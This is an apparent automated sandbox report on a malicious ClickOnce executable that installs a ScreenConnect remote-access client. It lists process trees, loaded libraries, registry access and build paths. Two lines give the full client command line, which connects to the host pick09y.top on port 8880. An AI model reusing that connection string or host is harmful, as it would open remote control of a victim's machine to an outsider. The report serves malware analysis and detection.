                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal57.evad.winEXE@18/75@2/3
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009C1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Deployment
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7440
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCommand line argument: dfshim0_2_009C1000
                  Source: pzPO97QouM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\pzPO97QouM.exe "C:\Users\user\Desktop\pzPO97QouM.exe"
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7440 -ip 7440
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 756
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "52c6258f-85a1-42d1-9479-cad4b97013ae" "User"
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 756
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: dfshim.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: version.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, profapi.dll, amsi.dll, userenv.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, propsys.dll, windowscodecs.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: pzPO97QouM.exe Static PE information: certificate valid
                  Source: pzPO97QouM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: pzPO97QouM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: pzPO97QouM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: pzPO97QouM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: pzPO97QouM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: pzPO97QouM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: pzPO97QouM.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: pzPO97QouM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E17B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1768258678.0000000002C02000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: pzPO97QouM.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E177000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1764722786.0000000002F42000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2595768885.0000000000D20000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2596143693.0000000002711000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1756054618.000000000044D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E536000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E193000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769693267.000000001BC32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E536000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E193000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769693267.000000001BC32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E17B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1768258678.0000000002C02000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E350000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674DFC5000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1765477512.0000000005582000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: pzPO97QouM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: pzPO97QouM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: pzPO97QouM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: pzPO97QouM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: pzPO97QouM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr Static PE information: 0xB80EE04C [Tue Nov 8 12:57:48 2067 UTC]
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe Code function: 0_2_009C1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree, 0_2_009C1000
                  Source: pzPO97QouM.exe Static PE information: real checksum: 0x1bda6 should be: 0x1a4ee
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe Code function: 0_2_009C1BC0 push ecx; ret 0_2_009C1BD3
